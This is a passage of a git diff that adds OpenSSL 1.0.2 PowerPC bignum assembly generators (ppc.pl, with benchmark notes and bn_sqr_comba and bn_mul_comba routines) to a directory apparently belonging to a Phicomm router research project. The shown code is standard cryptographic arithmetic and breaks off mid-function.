+	$POP	r22,`-10*$SIZE_T`($tj)
+	$POP	r23,`-9*$SIZE_T`($tj)
+	$POP	r24,`-8*$SIZE_T`($tj)
+	$POP	r25,`-7*$SIZE_T`($tj)
+	$POP	r26,`-6*$SIZE_T`($tj)
+	$POP	r27,`-5*$SIZE_T`($tj)
+	$POP	r28,`-4*$SIZE_T`($tj)
+	$POP	r29,`-3*$SIZE_T`($tj)
+	$POP	r30,`-2*$SIZE_T`($tj)
+	$POP	r31,`-1*$SIZE_T`($tj)
+	mr	$sp,$tj
+	blr
+	.long	0
+	.byte	0,12,4,0,0x80,12,6,0
+	.long	0
+.size	.bn_mul_mont_int,.-.bn_mul_mont_int
+
+.asciz  "Montgomery Multiplication for PPC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc.pl
new file mode 100644
index 0000000..04df1fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc.pl
@@ -0,0 +1,2008 @@
+#!/usr/bin/env perl
+#
+# Implemented as a Perl wrapper as we want to support several different
+# architectures with single file. We pick up the target based on the
+# file name we are asked to generate.
+#
+# It should be noted though that this perl code is nothing like
+# <openssl>/crypto/perlasm/x86*. In this case perl is used pretty much
+# as pre-processor to cover for platform differences in name decoration,
+# linker tables, 32-/64-bit instruction sets...
+#
+# As you might know there're several PowerPC ABI in use. Most notably
+# Linux and AIX use different 32-bit ABIs. Good news are that these ABIs
+# are similar enough to implement leaf(!) functions, which would be ABI
+# neutral. And that's what you find here: ABI neutral leaf functions.
+# In case you wonder what that is...
+#
+#       AIX performance
+#
+#	MEASUREMENTS WITH cc ON a 200 MhZ PowerPC 604e.
+#
+#	The following is the performance of 32-bit compiler
+#	generated code:
+#
+#	OpenSSL 0.9.6c 21 dec 2001
+#	built on: Tue Jun 11 11:06:51 EDT 2002
+#	options:bn(64,32) ...
+#compiler: cc -DTHREADS  -DAIX -DB_ENDIAN -DBN_LLONG -O3
+#                  sign    verify    sign/s verify/s
+#rsa  512 bits   0.0098s   0.0009s    102.0   1170.6
+#rsa 1024 bits   0.0507s   0.0026s     19.7    387.5
+#rsa 2048 bits   0.3036s   0.0085s      3.3    117.1
+#rsa 4096 bits   2.0040s   0.0299s      0.5     33.4
+#dsa  512 bits   0.0087s   0.0106s    114.3     94.5
+#dsa 1024 bits   0.0256s   0.0313s     39.0     32.0	
+#
+#	Same bechmark with this assembler code:
+#
+#rsa  512 bits   0.0056s   0.0005s    178.6   2049.2
+#rsa 1024 bits   0.0283s   0.0015s     35.3    674.1
+#rsa 2048 bits   0.1744s   0.0050s      5.7    201.2
+#rsa 4096 bits   1.1644s   0.0179s      0.9     55.7
+#dsa  512 bits   0.0052s   0.0062s    191.6    162.0
+#dsa 1024 bits   0.0149s   0.0180s     67.0     55.5
+#
+#	Number of operations increases by at almost 75%
+#
+#	Here are performance numbers for 64-bit compiler
+#	generated code:
+#
+#	OpenSSL 0.9.6g [engine] 9 Aug 2002
+#	built on: Fri Apr 18 16:59:20 EDT 2003
+#	options:bn(64,64) ...
+#	compiler: cc -DTHREADS -D_REENTRANT -q64 -DB_ENDIAN -O3
+#                  sign    verify    sign/s verify/s
+#rsa  512 bits   0.0028s   0.0003s    357.1   3844.4
+#rsa 1024 bits   0.0148s   0.0008s     67.5   1239.7
+#rsa 2048 bits   0.0963s   0.0028s     10.4    353.0
+#rsa 4096 bits   0.6538s   0.0102s      1.5     98.1
+#dsa  512 bits   0.0026s   0.0032s    382.5    313.7
+#dsa 1024 bits   0.0081s   0.0099s    122.8    100.6
+#
+#	Same benchmark with this assembler code:
+#
+#rsa  512 bits   0.0020s   0.0002s    510.4   6273.7
+#rsa 1024 bits   0.0088s   0.0005s    114.1   2128.3
+#rsa 2048 bits   0.0540s   0.0016s     18.5    622.5
+#rsa 4096 bits   0.3700s   0.0058s      2.7    171.0
+#dsa  512 bits   0.0016s   0.0020s    610.7    507.1
+#dsa 1024 bits   0.0047s   0.0058s    212.5    173.2
+#	
+#	Again, performance increases by at about 75%
+#
+#       Mac OS X, Apple G5 1.8GHz (Note this is 32 bit code)
+#       OpenSSL 0.9.7c 30 Sep 2003
+#
+#       Original code.
+#
+#rsa  512 bits   0.0011s   0.0001s    906.1  11012.5
+#rsa 1024 bits   0.0060s   0.0003s    166.6   3363.1
+#rsa 2048 bits   0.0370s   0.0010s     27.1    982.4
+#rsa 4096 bits   0.2426s   0.0036s      4.1    280.4
+#dsa  512 bits   0.0010s   0.0012s   1038.1    841.5
+#dsa 1024 bits   0.0030s   0.0037s    329.6    269.7
+#dsa 2048 bits   0.0101s   0.0127s     98.9     78.6
+#
+#       Same benchmark with this assembler code:
+#
+#rsa  512 bits   0.0007s   0.0001s   1416.2  16645.9
+#rsa 1024 bits   0.0036s   0.0002s    274.4   5380.6
+#rsa 2048 bits   0.0222s   0.0006s     45.1   1589.5
+#rsa 4096 bits   0.1469s   0.0022s      6.8    449.6
+#dsa  512 bits   0.0006s   0.0007s   1664.2   1376.2
+#dsa 1024 bits   0.0018s   0.0023s    545.0    442.2
+#dsa 2048 bits   0.0061s   0.0075s    163.5    132.8
+#
+#        Performance increase of ~60%
+#
+#	If you have comments or suggestions to improve code send
+#	me a note at schari@us.ibm.com
+#
+
+$flavour = shift;
+
+if ($flavour =~ /32/) {
+	$BITS=	32;
+	$BNSZ=	$BITS/8;
+	$ISA=	"\"ppc\"";
+
+	$LD=	"lwz";		# load
+	$LDU=	"lwzu";		# load and update
+	$ST=	"stw";		# store
+	$STU=	"stwu";		# store and update
+	$UMULL=	"mullw";	# unsigned multiply low
+	$UMULH=	"mulhwu";	# unsigned multiply high
+	$UDIV=	"divwu";	# unsigned divide
+	$UCMPI=	"cmplwi";	# unsigned compare with immediate
+	$UCMP=	"cmplw";	# unsigned compare
+	$CNTLZ=	"cntlzw";	# count leading zeros
+	$SHL=	"slw";		# shift left
+	$SHR=	"srw";		# unsigned shift right
+	$SHRI=	"srwi";		# unsigned shift right by immediate	
+	$SHLI=	"slwi";		# shift left by immediate
+	$CLRU=	"clrlwi";	# clear upper bits
+	$INSR=	"insrwi";	# insert right
+	$ROTL=	"rotlwi";	# rotate left by immediate
+	$TR=	"tw";		# conditional trap
+} elsif ($flavour =~ /64/) {
+	$BITS=	64;
+	$BNSZ=	$BITS/8;
+	$ISA=	"\"ppc64\"";
+
+	# same as above, but 64-bit mnemonics...
+	$LD=	"ld";		# load
+	$LDU=	"ldu";		# load and update
+	$ST=	"std";		# store
+	$STU=	"stdu";		# store and update
+	$UMULL=	"mulld";	# unsigned multiply low
+	$UMULH=	"mulhdu";	# unsigned multiply high
+	$UDIV=	"divdu";	# unsigned divide
+	$UCMPI=	"cmpldi";	# unsigned compare with immediate
+	$UCMP=	"cmpld";	# unsigned compare
+	$CNTLZ=	"cntlzd";	# count leading zeros
+	$SHL=	"sld";		# shift left
+	$SHR=	"srd";		# unsigned shift right
+	$SHRI=	"srdi";		# unsigned shift right by immediate	
+	$SHLI=	"sldi";		# shift left by immediate
+	$CLRU=	"clrldi";	# clear upper bits
+	$INSR=	"insrdi";	# insert right 
+	$ROTL=	"rotldi";	# rotate left by immediate
+	$TR=	"td";		# conditional trap
+} else { die "nonsense $flavour"; }
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$data=<<EOF;
+#--------------------------------------------------------------------
+#
+#
+#
+#
+#	File:		ppc32.s
+#
+#	Created by:	Suresh Chari
+#			IBM Thomas J. Watson Research Library
+#			Hawthorne, NY
+#
+#
+#	Description:	Optimized assembly routines for OpenSSL crypto
+#			on the 32 bitPowerPC platform.
+#
+#
+#	Version History
+#
+#	2. Fixed bn_add,bn_sub and bn_div_words, added comments,
+#	   cleaned up code. Also made a single version which can
+#	   be used for both the AIX and Linux compilers. See NOTE
+#	   below.
+#				12/05/03		Suresh Chari
+#			(with lots of help from)        Andy Polyakov
+##	
+#	1. Initial version	10/20/02		Suresh Chari
+#
+#
+#	The following file works for the xlc,cc
+#	and gcc compilers.
+#
+#	NOTE:	To get the file to link correctly with the gcc compiler
+#	        you have to change the names of the routines and remove
+#		the first .(dot) character. This should automatically
+#		be done in the build process.
+#
+#	Hand optimized assembly code for the following routines
+#	
+#	bn_sqr_comba4
+#	bn_sqr_comba8
+#	bn_mul_comba4
+#	bn_mul_comba8
+#	bn_sub_words
+#	bn_add_words
+#	bn_div_words
+#	bn_sqr_words
+#	bn_mul_words
+#	bn_mul_add_words
+#
+#	NOTE:	It is possible to optimize this code more for
+#	specific PowerPC or Power architectures. On the Northstar
+#	architecture the optimizations in this file do
+#	 NOT provide much improvement.
+#
+#	If you have comments or suggestions to improve code send
+#	me a note at schari\@us.ibm.com
+#
+#--------------------------------------------------------------------------
+#
+#	Defines to be used in the assembly code.
+#	
+#.set r0,0	# we use it as storage for value of 0
+#.set SP,1	# preserved
+#.set RTOC,2	# preserved 
+#.set r3,3	# 1st argument/return value
+#.set r4,4	# 2nd argument/volatile register
+#.set r5,5	# 3rd argument/volatile register
+#.set r6,6	# ...
+#.set r7,7
+#.set r8,8
+#.set r9,9
+#.set r10,10
+#.set r11,11
+#.set r12,12
+#.set r13,13	# not used, nor any other "below" it...
+
+#	Declare function names to be global
+#	NOTE:	For gcc these names MUST be changed to remove
+#	        the first . i.e. for example change ".bn_sqr_comba4"
+#		to "bn_sqr_comba4". This should be automatically done
+#		in the build.
+	
+	.globl	.bn_sqr_comba4
+	.globl	.bn_sqr_comba8
+	.globl	.bn_mul_comba4
+	.globl	.bn_mul_comba8
+	.globl	.bn_sub_words
+	.globl	.bn_add_words
+	.globl	.bn_div_words
+	.globl	.bn_sqr_words
+	.globl	.bn_mul_words
+	.globl	.bn_mul_add_words
+	
+# .text section
+	
+	.machine	"any"
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_sqr_comba4" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4
+.bn_sqr_comba4:
+#
+# Optimized version of bn_sqr_comba4.
+#
+# void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
+# r3 contains r
+# r4 contains a
+#
+# Freely use registers r5,r6,r7,r8,r9,r10,r11 as follows:	
+# 
+# r5,r6 are the two BN_ULONGs being multiplied.
+# r7,r8 are the results of the 32x32 giving 64 bit multiply.
+# r9,r10, r11 are the equivalents of c1,c2, c3.
+# Here's the assembly
+#
+#
+	xor		r0,r0,r0		# set r0 = 0. Used in the addze
+						# instructions below
+	
+						#sqr_add_c(a,0,c1,c2,c3)
+	$LD		r5,`0*$BNSZ`(r4)		
+	$UMULL		r9,r5,r5		
+	$UMULH		r10,r5,r5		#in first iteration. No need
+						#to add since c1=c2=c3=0.
+						# Note c3(r11) is NOT set to 0
+						# but will be.
+
+	$ST		r9,`0*$BNSZ`(r3)	# r[0]=c1;
+						# sqr_add_c2(a,1,0,c2,c3,c1);
+	$LD		r6,`1*$BNSZ`(r4)		
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+					
+	addc		r7,r7,r7		# compute (r7,r8)=2*(r7,r8)
+	adde		r8,r8,r8
+	addze		r9,r0			# catch carry if any.
+						# r9= r0(=0) and carry 
+	
+	addc		r10,r7,r10		# now add to temp result.
+	addze		r11,r8                  # r8 added to r11 which is 0 
+	addze		r9,r9
+	
+	$ST		r10,`1*$BNSZ`(r3)	#r[1]=c2; 
+						#sqr_add_c(a,1,c3,c1,c2)
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r0
+						#sqr_add_c2(a,2,0,c3,c1,c2)
+	$LD		r6,`2*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r7,r7,r7
+	adde		r8,r8,r8
+	addze		r10,r10
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	$ST		r11,`2*$BNSZ`(r3)	#r[2]=c3 
+						#sqr_add_c2(a,3,0,c1,c2,c3);
+	$LD		r6,`3*$BNSZ`(r4)		
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r7,r7,r7
+	adde		r8,r8,r8
+	addze		r11,r0
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,2,1,c1,c2,c3);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`2*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r7,r7,r7
+	adde		r8,r8,r8
+	addze		r11,r11
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	$ST		r9,`3*$BNSZ`(r3)	#r[3]=c1
+						#sqr_add_c(a,2,c2,c3,c1);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r0
+						#sqr_add_c2(a,3,1,c2,c3,c1);
+	$LD		r6,`3*$BNSZ`(r4)		
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r7,r7,r7
+	adde		r8,r8,r8
+	addze		r9,r9
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	$ST		r10,`4*$BNSZ`(r3)	#r[4]=c2
+						#sqr_add_c2(a,3,2,c3,c1,c2);
+	$LD		r5,`2*$BNSZ`(r4)		
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r7,r7,r7
+	adde		r8,r8,r8
+	addze		r10,r0
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	$ST		r11,`5*$BNSZ`(r3)	#r[5] = c3
+						#sqr_add_c(a,3,c1,c2,c3);
+	$UMULL		r7,r6,r6		
+	$UMULH		r8,r6,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+
+	$ST		r9,`6*$BNSZ`(r3)	#r[6]=c1
+	$ST		r10,`7*$BNSZ`(r3)	#r[7]=c2
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,2,0
+	.long	0
+.size	.bn_sqr_comba4,.-.bn_sqr_comba4
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_sqr_comba8" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+	
+.align	4
+.bn_sqr_comba8:
+#
+# This is an optimized version of the bn_sqr_comba8 routine.
+# Tightly uses the adde instruction
+#
+#
+# void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
+# r3 contains r
+# r4 contains a
+#
+# Freely use registers r5,r6,r7,r8,r9,r10,r11 as follows:	
+# 
+# r5,r6 are the two BN_ULONGs being multiplied.
+# r7,r8 are the results of the 32x32 giving 64 bit multiply.
+# r9,r10, r11 are the equivalents of c1,c2, c3.
+#
+# Possible optimization of loading all 8 longs of a into registers
+# doesnt provide any speedup
+# 
+
+	xor		r0,r0,r0		#set r0 = 0.Used in addze
+						#instructions below.
+
+						#sqr_add_c(a,0,c1,c2,c3);
+	$LD		r5,`0*$BNSZ`(r4)
+	$UMULL		r9,r5,r5		#1st iteration:	no carries.
+	$UMULH		r10,r5,r5
+	$ST		r9,`0*$BNSZ`(r3)	# r[0]=c1;
+						#sqr_add_c2(a,1,0,c2,c3,c1);
+	$LD		r6,`1*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6	
+	
+	addc		r10,r7,r10		#add the two register number
+	adde		r11,r8,r0 		# (r8,r7) to the three register
+	addze		r9,r0			# number (r9,r11,r10).NOTE:r0=0
+	
+	addc		r10,r7,r10		#add the two register number
+	adde		r11,r8,r11 		# (r8,r7) to the three register
+	addze		r9,r9			# number (r9,r11,r10).
+	
+	$ST		r10,`1*$BNSZ`(r3)	# r[1]=c2
+				
+						#sqr_add_c(a,1,c3,c1,c2);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r0
+						#sqr_add_c2(a,2,0,c3,c1,c2);
+	$LD		r6,`2*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	
+	$ST		r11,`2*$BNSZ`(r3)	#r[2]=c3
+						#sqr_add_c2(a,3,0,c1,c2,c3);
+	$LD		r6,`3*$BNSZ`(r4)	#r6 = a[3]. r5 is already a[0].
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r0
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,2,1,c1,c2,c3);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`2*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	
+	$ST		r9,`3*$BNSZ`(r3)	#r[3]=c1;
+						#sqr_add_c(a,2,c2,c3,c1);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r0
+						#sqr_add_c2(a,3,1,c2,c3,c1);
+	$LD		r6,`3*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+						#sqr_add_c2(a,4,0,c2,c3,c1);
+	$LD		r5,`0*$BNSZ`(r4)
+	$LD		r6,`4*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	$ST		r10,`4*$BNSZ`(r3)	#r[4]=c2;
+						#sqr_add_c2(a,5,0,c3,c1,c2);
+	$LD		r6,`5*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r0
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+						#sqr_add_c2(a,4,1,c3,c1,c2);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`4*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+						#sqr_add_c2(a,3,2,c3,c1,c2);
+	$LD		r5,`2*$BNSZ`(r4)
+	$LD		r6,`3*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	$ST		r11,`5*$BNSZ`(r3)	#r[5]=c3;
+						#sqr_add_c(a,3,c1,c2,c3);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r0
+						#sqr_add_c2(a,4,2,c1,c2,c3);
+	$LD		r6,`4*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,5,1,c1,c2,c3);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`5*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,6,0,c1,c2,c3);
+	$LD		r5,`0*$BNSZ`(r4)
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	$ST		r9,`6*$BNSZ`(r3)	#r[6]=c1;
+						#sqr_add_c2(a,7,0,c2,c3,c1);
+	$LD		r6,`7*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r0
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+						#sqr_add_c2(a,6,1,c2,c3,c1);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+						#sqr_add_c2(a,5,2,c2,c3,c1);
+	$LD		r5,`2*$BNSZ`(r4)
+	$LD		r6,`5*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+						#sqr_add_c2(a,4,3,c2,c3,c1);
+	$LD		r5,`3*$BNSZ`(r4)
+	$LD		r6,`4*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	$ST		r10,`7*$BNSZ`(r3)	#r[7]=c2;
+						#sqr_add_c(a,4,c3,c1,c2);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r0
+						#sqr_add_c2(a,5,3,c3,c1,c2);
+	$LD		r6,`5*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+						#sqr_add_c2(a,6,2,c3,c1,c2);
+	$LD		r5,`2*$BNSZ`(r4)
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+						#sqr_add_c2(a,7,1,c3,c1,c2);
+	$LD		r5,`1*$BNSZ`(r4)
+	$LD		r6,`7*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	$ST		r11,`8*$BNSZ`(r3)	#r[8]=c3;
+						#sqr_add_c2(a,7,2,c1,c2,c3);
+	$LD		r5,`2*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r0
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,6,3,c1,c2,c3);
+	$LD		r5,`3*$BNSZ`(r4)
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+						#sqr_add_c2(a,5,4,c1,c2,c3);
+	$LD		r5,`4*$BNSZ`(r4)
+	$LD		r6,`5*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	$ST		r9,`9*$BNSZ`(r3)	#r[9]=c1;
+						#sqr_add_c(a,5,c2,c3,c1);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r0
+						#sqr_add_c2(a,6,4,c2,c3,c1);
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+						#sqr_add_c2(a,7,3,c2,c3,c1);
+	$LD		r5,`3*$BNSZ`(r4)
+	$LD		r6,`7*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	$ST		r10,`10*$BNSZ`(r3)	#r[10]=c2;
+						#sqr_add_c2(a,7,4,c3,c1,c2);
+	$LD		r5,`4*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r0
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+						#sqr_add_c2(a,6,5,c3,c1,c2);
+	$LD		r5,`5*$BNSZ`(r4)
+	$LD		r6,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	addze		r10,r10
+	$ST		r11,`11*$BNSZ`(r3)	#r[11]=c3;
+						#sqr_add_c(a,6,c1,c2,c3);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r0
+						#sqr_add_c2(a,7,5,c1,c2,c3)
+	$LD		r6,`7*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	addc		r9,r7,r9
+	adde		r10,r8,r10
+	addze		r11,r11
+	$ST		r9,`12*$BNSZ`(r3)	#r[12]=c1;
+	
+						#sqr_add_c2(a,7,6,c2,c3,c1)
+	$LD		r5,`6*$BNSZ`(r4)
+	$UMULL		r7,r5,r6
+	$UMULH		r8,r5,r6
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r0
+	addc		r10,r7,r10
+	adde		r11,r8,r11
+	addze		r9,r9
+	$ST		r10,`13*$BNSZ`(r3)	#r[13]=c2;
+						#sqr_add_c(a,7,c3,c1,c2);
+	$UMULL		r7,r6,r6
+	$UMULH		r8,r6,r6
+	addc		r11,r7,r11
+	adde		r9,r8,r9
+	$ST		r11,`14*$BNSZ`(r3)	#r[14]=c3;
+	$ST		r9, `15*$BNSZ`(r3)	#r[15]=c1;
+
+
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,2,0
+	.long	0
+.size	.bn_sqr_comba8,.-.bn_sqr_comba8
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_mul_comba4" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4
+.bn_mul_comba4:
+#
+# This is an optimized version of the bn_mul_comba4 routine.
+#
+# void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+# r3 contains r
+# r4 contains a
+# r5 contains b
+# r6, r7 are the 2 BN_ULONGs being multiplied.
+# r8, r9 are the results of the 32x32 giving 64 multiply.
+# r10, r11, r12 are the equivalents of c1, c2, and c3.
+#
+	xor	r0,r0,r0		#r0=0. Used in addze below.
+					#mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	r6,`0*$BNSZ`(r4)		
+	$LD	r7,`0*$BNSZ`(r5)		
+	$UMULL	r10,r6,r7		
+	$UMULH	r11,r6,r7		
+	$ST	r10,`0*$BNSZ`(r3)	#r[0]=c1
+					#mul_add_c(a[0],b[1],c2,c3,c1);
+	$LD	r7,`1*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r8,r11
+	adde	r12,r9,r0
